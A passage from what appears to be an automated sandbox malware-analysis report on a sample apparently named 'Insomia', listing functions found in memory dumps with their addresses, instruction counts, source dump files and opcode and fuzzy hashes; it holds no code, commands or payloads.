Instruction Fuzzy Hash: 4721CF725093808FCB03DF14D994B15BF71FB86314F28829AD8448B693C33AD40ACB72

Function 016D4F00 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78c891eb13ef1f586b7ace8b098bb3efc6cd792a1c163fc2f09555cf203e4c6f
Instruction ID: 84e348d5ec1dfaffff1d0ec488d666fb78ecadee38c6e4afd80780e1a37eb0be
Opcode Fuzzy Hash: 78c891eb13ef1f586b7ace8b098bb3efc6cd792a1c163fc2f09555cf203e4c6f
Instruction Fuzzy Hash: 82118230E082418FEB129B7DAD4CB223BA6EBC5244F4984E6D406C7676EF78CC55CB41

Function 05E9D70D Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c781d89f67ba1cc5b55c50b289cc72afd8b2fd32b64ba2fe606fa31a3439e1d9
Instruction ID: f28c2c2aa5c5f2359a7ae0fe167564967a9bfb05cf487a69bc3a6ba20ebdf616
Opcode Fuzzy Hash: c781d89f67ba1cc5b55c50b289cc72afd8b2fd32b64ba2fe606fa31a3439e1d9
Instruction Fuzzy Hash: 8111B4706102118FCB14EB78E8457AE7FEAEF88304F408539D04ADB695DFB5AD058790

Function 060CFDF8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e48173c214c942dc495e886fdf7b55774d71641aa85fc3bd319913bd1066f1
Instruction ID: f8e5dab187c4c2ed3e74fe43f74e78c217e78d6abee0edd140a040e0ddc6de56
Opcode Fuzzy Hash: 25e48173c214c942dc495e886fdf7b55774d71641aa85fc3bd319913bd1066f1
Instruction Fuzzy Hash: 04216D70D4420ADFDB80DFA5D4446EEBBB6EF49320F509029C514A3352E7785A45CF92

Function 060C6500 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcf41b04b0b6ddf8abf0066dd0d154f39edfa9ad15f2ecfda17b9fb37daa3b8d
Instruction ID: 939ef06107fec9856857d8bdb9023eef0016bfb0a4926f6fad4853d1ef15b618
Opcode Fuzzy Hash: dcf41b04b0b6ddf8abf0066dd0d154f39edfa9ad15f2ecfda17b9fb37daa3b8d
Instruction Fuzzy Hash: DE110275D951499FC7A1CBB4D9006EDBFF0EF45221F2082EEC809D7252EB364A52DB81

Function 060CE638 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a85d9c6c4f82eb68a0e509eff6046280d4e0d2ab2582185ff8b0485661423f7
Instruction ID: 6ec27de6781dbc245edbeb0a428a6499512a79b72261ef843536f35d78fae16e
Opcode Fuzzy Hash: 3a85d9c6c4f82eb68a0e509eff6046280d4e0d2ab2582185ff8b0485661423f7
Instruction Fuzzy Hash: 6C21C739A0021A8FCB44DFA8D9445EEBBF6FF88305F109269D515A7398DB345D05CBA2

Function 016D7E00 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a6a3bf33f5f1c2373e9f56ac0ffe41aa5938c2a914826ddf8cd99c5eddf726
Instruction ID: 61016ba26fbfc84196937afa34c5c61daf8a663a2578c47339f66c2a1ead4ae8
Opcode Fuzzy Hash: d0a6a3bf33f5f1c2373e9f56ac0ffe41aa5938c2a914826ddf8cd99c5eddf726
Instruction Fuzzy Hash: 1011E15684D3C04FC78B47689D214953F72ED631687AE50CBD4958F6A3D60A0C878723

Function 016DDEC0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30992259d82d63630f35e28b6a5a58a45013deb0f5bab86584fd60ef7e76fc98
Instruction ID: 6155f0f449e38040bab444eae9a9ad92b175decd7e7039f2f3a5bb572ac9fc5f
Opcode Fuzzy Hash: 30992259d82d63630f35e28b6a5a58a45013deb0f5bab86584fd60ef7e76fc98
Instruction Fuzzy Hash: AD1120B0D04209CFDB04DFEAD8456EEBBBAEB88310F00806AD509B3290D7711A55CBA0

Function 0167D4C7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120700031.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: e16cdbc420d792fe9a6009373c8efe0b2b5ef2b1d6fe70d1fb7a3a069cd4f5bd
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: DB11AF76504240DFDB06CF54D9C4B16BF62FB98324F24CAA9D9490B256C336D45ACBA2

Function 05E9E8A1 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f70453b5bdc92c8bc44183fc1c0f15ad4457f5f78ca7d782faa4f12b19a5d056
Instruction ID: 295b9d1c4000c59c47f9aac105f2f5d25f114ad1eaaf3c2c4d168f5f7511aa95
Opcode Fuzzy Hash: f70453b5bdc92c8bc44183fc1c0f15ad4457f5f78ca7d782faa4f12b19a5d056
Instruction Fuzzy Hash: 69215078A42259AFDF08DFA8D594EADBBB2BF49304F154095F902AB361CB30AD41CB50

Function 060C790E Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b3fc1e4bf774a3813fc037cc2a8f185701f7a905f21ac22d2f5f984947e755
Instruction ID: 6f32f727213cc36aac362900a65084e3faf92dfcc3854799f25863b9a58b2fac
Opcode Fuzzy Hash: 72b3fc1e4bf774a3813fc037cc2a8f185701f7a905f21ac22d2f5f984947e755
Instruction Fuzzy Hash: F611E130845244AFCBC1CBB8C8006EEBFF1EB46220F1062DAC049D7292C7354A46DB62

Function 05E97ED0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1339e75f7b280bb901f805fffec8b7818668370c4e9d83540a50340650a8716b
Instruction ID: b9f39f77626924476d42dc595d27baa1e5a7fb8fec3e6994f94b131b7e1dc875
Opcode Fuzzy Hash: 1339e75f7b280bb901f805fffec8b7818668370c4e9d83540a50340650a8716b
Instruction Fuzzy Hash: 19113770E152288BEB28CF6AD844BDDBAB6FB8A300F00D0AAD45DB7355DB300985CF50

Function 016D4F10 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b309e64277162ac649596466d531a7c7f2fa673d2db12c4df748902db2094b4a
Instruction ID: c5a028a7bd30b9e558333ec501cf5c7f18c8184584353f19af2e7221046b02fe
Opcode Fuzzy Hash: b309e64277162ac649596466d531a7c7f2fa673d2db12c4df748902db2094b4a
Instruction Fuzzy Hash: 19110530E101018BFB259A6DAC0CB663696E7C8345F44C8A5E806C7AA9EF78DC82CB41

Function 05E9E780 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13ea66aac35231edccc0b143a805bfde0787b213a9d6dd6523782dcc6e17b8b3
Instruction ID: 19783a42aa8053632d0d13d3f9d00ece9a90446ea800436d44730f24e7ec73a7
Opcode Fuzzy Hash: 13ea66aac35231edccc0b143a805bfde0787b213a9d6dd6523782dcc6e17b8b3
Instruction Fuzzy Hash: A001483A350315AFDB148E59DC95F9A77AEFB89B25F104066FA15CB390CA71D8108790

Function 05E9EB35 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8dbc7752776605e7bb4774ae35d888071e00ca9f9675db8aea00b5d7a1eb8ad
Instruction ID: 0fe003627cfe9c72383ff6b0a2582883093358030e80087458d054da0ecb582e
Opcode Fuzzy Hash: d8dbc7752776605e7bb4774ae35d888071e00ca9f9675db8aea00b5d7a1eb8ad
Instruction Fuzzy Hash: 3E118E35B002149FDF68DF7998517BE7BF6BB88210F14406AEA96DB380EB30D901CB90

Function 016D7DBB Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c121fb97350028c8022fc3158bca1f6264223d4410f680d6789661dbbff57614
Instruction ID: a0eea40542c2ef89f4b572ed09153b18a90d50f47e0e58184c2fa439e93401cb
Opcode Fuzzy Hash: c121fb97350028c8022fc3158bca1f6264223d4410f680d6789661dbbff57614
Instruction Fuzzy Hash: 2C01F931A48350AFD695C794DC508A57B62DF96318B69C49FE8490B792C732DC438782

Function 05E99758 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7521448e37467149436b8b4d4a380bb940df8dc0c650b661ae41c3891d814351
Instruction ID: 87857ff7982234e423595ff315889572eaf3b142e9c46970d5b0064d11909a8f
Opcode Fuzzy Hash: 7521448e37467149436b8b4d4a380bb940df8dc0c650b661ae41c3891d814351
Instruction Fuzzy Hash: BD11153AE002199BCB04DFA8D8446EEB7B5FB88215F00416AD509A3244DB355A45CBA1

Function 016D594F Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfcedae12e7a29264672cadf1cda3c632293d1f096398c3edd1ee93a9fc4216c
Instruction ID: 5ece832889aba084d41b35205f52396238878c0f5f5db7532c8cc6d411360ebf
Opcode Fuzzy Hash: dfcedae12e7a29264672cadf1cda3c632293d1f096398c3edd1ee93a9fc4216c
Instruction Fuzzy Hash: D4110234F44248CFEB14CBA8DD95BADBBB1EB09724F144065E503EF794C67199468B82

Function 0633A2F8 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3184edbe9509202e2df845b195b78e97e8b7f746a5b01b2d6df613d9ae2d9624
Instruction ID: a4280bfe83205008d9229a98e70a030667995098d1b61f3789c1366724ba29e5
Opcode Fuzzy Hash: 3184edbe9509202e2df845b195b78e97e8b7f746a5b01b2d6df613d9ae2d9624
Instruction Fuzzy Hash: 32111770D09218DFDB84DFA9D9406AEBBF9FF49311F2095AAD449A3200E7754A85CF80

Function 05E99748 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f069fa008a304d430bf05ec4aef7459b31305af1e471b95889b86e4b57da81b5
Instruction ID: b13e89f5c76a10c9ddc0b3368062586b7f1c67de8a28605b2869e9b67ca3b853
Opcode Fuzzy Hash: f069fa008a304d430bf05ec4aef7459b31305af1e471b95889b86e4b57da81b5
Instruction Fuzzy Hash: BB11537AE00219CFCB08CFA8C8856EEB7F5FB88215F00416AD116B3384DB385A41CBA0

Function 05E98326 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d789d5e7c7b14776a25bed0c4a05296a22732908a6af73dedd5223968042666d
Instruction ID: f90fa124e9cf3aecf38c107a19e501f18b74fb185da0048e670c843e89904337
Opcode Fuzzy Hash: d789d5e7c7b14776a25bed0c4a05296a22732908a6af73dedd5223968042666d
Instruction Fuzzy Hash: 4E115B70A11218CFEB28DF64D888BA9B7B2FB09348F40D099E849E3340DB745D84DF40

Function 060C6F81 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 885fb8ede263af1215ae285b5a20909d42eea1944000d8eaf788a76a6ac3a8ab
Instruction ID: 36bbd7a8a82630b492713c5a81c9290c1b582fd0097769b32441bf8f0b73c3bb
Opcode Fuzzy Hash: 885fb8ede263af1215ae285b5a20909d42eea1944000d8eaf788a76a6ac3a8ab
Instruction Fuzzy Hash: 6601F134884144AFC7A0CBE8C9006EDBFF0AB49221F1082EAC409D7391D7368A42DB41

Function 016D7E50 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2fafdef9238a9c8617a6942ed66085006c78e17f63bfaab36827318075fdaa
Instruction ID: 25eee472accbe876ecfb9857e8de5b1088f8b24a613bd8ba53ae1ec03ab5f3df
Opcode Fuzzy Hash: 8e2fafdef9238a9c8617a6942ed66085006c78e17f63bfaab36827318075fdaa
Instruction Fuzzy Hash: 3A012873A497855FD76297649C204693FB2DFE221871580CBE444CB363D662CD43C766

Function 05EEE630 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bba6be96d317cf3c08ef62ea0bc7403a6121ad37bf9c52cda73c2cc52edc9dc
Instruction ID: f4ab8371bc60e73e92b03a31a8f13bc5e236a48b72b1c4891b227b72d25a5194
Opcode Fuzzy Hash: 7bba6be96d317cf3c08ef62ea0bc7403a6121ad37bf9c52cda73c2cc52edc9dc
Instruction Fuzzy Hash: 790180B0E1924A9FD705CFB9C5412AEBFF6BF49300F54D1AAC049E2201E7304680CF91

Function 060C63D8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0c39febd23e48ac5a9fecd192cfccebea081783f71ba92dc57956cc51bbd95
Instruction ID: 3fa64f58431f867a4a296d48c7ba86344188898beaf0b0a3eb576261b5620002
Opcode Fuzzy Hash: 2a0c39febd23e48ac5a9fecd192cfccebea081783f71ba92dc57956cc51bbd95
Instruction Fuzzy Hash: 0211ACB4E05349CFCB91CFE8D5542AE7FF1EB4A220F1041AAC405A7385DB350A82DBE2

Function 05E9AB26 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e64575723da991171e0eca609c272da7f6e79238cad9dbe525cbb8f8a427bb
Instruction ID: 7f366b1b15ba0c8af66a66677a1d3ee147d5204ef971d54f94f36e3cd739a794
Opcode Fuzzy Hash: 36e64575723da991171e0eca609c272da7f6e79238cad9dbe525cbb8f8a427bb
Instruction Fuzzy Hash: E3111378A04319CFCB64CF58E88479EBBB2FB08304F5080A9E44AA3355DB345D80CF42

Function 016D2393 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12420db25b230e4b245e9e8264e81994233341188702ee3709b28cc67ec3be17
Instruction ID: 57315edba5d3bda6803f9d3bd9e614f4f1ffd2d53d366d68c05296034a6cbf66
Opcode Fuzzy Hash: 12420db25b230e4b245e9e8264e81994233341188702ee3709b28cc67ec3be17
Instruction Fuzzy Hash: C5118674A01229DFEB249F64DD58BADBBB1BB48301F2052D9D90AA3354DB705E91CF50

Function 01B40338 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 562db3158e52abb67534ea48c2e2934919a6e0b612df45a199385bc4920acce1
Instruction ID: e3ac984a7b9308ef63c8677a5e8bb632e1b6d9696dd31f057ccb8d22270647a6
Opcode Fuzzy Hash: 562db3158e52abb67534ea48c2e2934919a6e0b612df45a199385bc4920acce1
Instruction Fuzzy Hash: 70F0C83114D3808FC3169768C8508453FB5AF8332074A84EBE195CF173C365BC05C761

Function 05E9AFC3 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4793a0a3f39ea261cfb1084b7f6af06b6eb4e292ca3da26e5bcaaf17d038fafa
Instruction ID: 3f003da3c3586ba8e79a615c2af12b00b32f3ba7d1beb57ba6ed8cc70cf5f30f
Opcode Fuzzy Hash: 4793a0a3f39ea261cfb1084b7f6af06b6eb4e292ca3da26e5bcaaf17d038fafa
Instruction Fuzzy Hash: 5711FB78A00229CFCB64DF64D9847DA7BB2FB98344F1080A9D449A3798DB745DC0DF51

Function 016D09F1 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64efcb1ca020f8bbd3573a57c57967b142e93a33e956eecc926b012de925d1e
Instruction ID: 68b163951368e94da25d5e33269df28502137e814f38be65db2d49b47c021473
Opcode Fuzzy Hash: e64efcb1ca020f8bbd3573a57c57967b142e93a33e956eecc926b012de925d1e
Instruction Fuzzy Hash: D4F0A47144E3C5AFCB434BA19C644D63FF89E6322036A10EBD494CE0A3E15C4D9AD766

Function 05E9811A Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d707f6f73498950eeadc430182461059283c706729350e9fa35a673eb5e9d48
Instruction ID: abea244dff06d9ea26b65babdb4b124b0b7ab70f467206c24c83666ca0aa7bf0
Opcode Fuzzy Hash: 9d707f6f73498950eeadc430182461059283c706729350e9fa35a673eb5e9d48
Instruction Fuzzy Hash: D1114534E11228CFEB28DF64C884B99B7B1FF49344F409099E849A7344DB346D89CF50

Function 05E9DC08 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec29933020fc82264d9fff34028b13df68dee466d610cf2d9817668c3fc55025
Instruction ID: 325182d4b88abb3b7fea1a36e755a6bab3d2401c4fe2493871ffc7a594609368
Opcode Fuzzy Hash: ec29933020fc82264d9fff34028b13df68dee466d610cf2d9817668c3fc55025
Instruction Fuzzy Hash: 49F05062F0D3A05FE71A47381D607656F92DFD6244F0400DBC0C28F2A5F9569803C350

Function 05E9DBA0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eeedae4c6b35c35596902b8528a377bd74825a1005678d11f7b01cc27632155
Instruction ID: a3e4c95b25141d2422a837e2d324feb23cabcef8b981ea17c6421674f458b51e
Opcode Fuzzy Hash: 3eeedae4c6b35c35596902b8528a377bd74825a1005678d11f7b01cc27632155
Instruction Fuzzy Hash: 3AF08B76F483206FEB1887589D447AAB7DAEF88330F04456AD045AB3D4EE71DC40C390

Function 05E9DBB0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc7711b6fd8040d4b396f7483b56e521dc51738aaa02a7a42d1c0a91243e77f4
Instruction ID: ad48a148dc9c6434aeb70d20b4eee2ce6e00bea42b30685b47e26fef4bbd0064
Opcode Fuzzy Hash: dc7711b6fd8040d4b396f7483b56e521dc51738aaa02a7a42d1c0a91243e77f4
Instruction Fuzzy Hash: 6AF0E931F482255FEB1886199D10B6BF7AEEFC8720F144429E54A9B350EAB5AC41C3D0

Function 060C63E8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c233167534df7e2bf3b295da9379b5a2844af04ba5a4d1b89e76ec2d1786af3d
Instruction ID: cc643792df423d6b243f55c82fc852959440d66270b9aae36f581a5eb3dd2c93
Opcode Fuzzy Hash: c233167534df7e2bf3b295da9379b5a2844af04ba5a4d1b89e76ec2d1786af3d
Instruction Fuzzy Hash: 2E0116B4E05209CFCB94DFA8D9852AEBBF1FB48310F508169D409E3344EB345A41CBD1

Function 060CA7F8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8d46e5ba19d3b10d4cac5d4370c00fc6776da649b26d582eed2919f65cf7f8
Instruction ID: 4ae84b344e37aeb651320ce880887d4bc0dfa9a21820103acb9e1420f755d412
Opcode Fuzzy Hash: db8d46e5ba19d3b10d4cac5d4370c00fc6776da649b26d582eed2919f65cf7f8
Instruction Fuzzy Hash: CFF09030E4524CAFCB84DBB8D8406ACBBF1EB49311F0482DED808D3351D7365916CB81

Function 05E96D80 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f97932fb380e9b0b8f927fdd7c476217551e4d4fc89d65f7df10783428910af
Instruction ID: b12607290dd8432af4cb023ff647fd1ccbb0d35557a3ddf521020e38eeab44ef
Opcode Fuzzy Hash: 0f97932fb380e9b0b8f927fdd7c476217551e4d4fc89d65f7df10783428910af
Instruction Fuzzy Hash: 15011936404108FFCF46DF90DD45E99BF76FB48310F199199A9445B272C332D925EB40

Function 05E91FC8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d21ff4fa427801e3f375a4a8aba7d4ca70670e06eaacf9f055d44856b1f3e30d
Instruction ID: 6bcf77e97b25ad71c609ed4e2078b3a7718ad76426cde8a69580b5250a1d9e9f
Opcode Fuzzy Hash: d21ff4fa427801e3f375a4a8aba7d4ca70670e06eaacf9f055d44856b1f3e30d
Instruction Fuzzy Hash: 2AF09075D0420DAFCB08DFA8D8405ADFBF1EF49301F0092E9984993351EB329A51DF91

Function 05E9DBAC Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

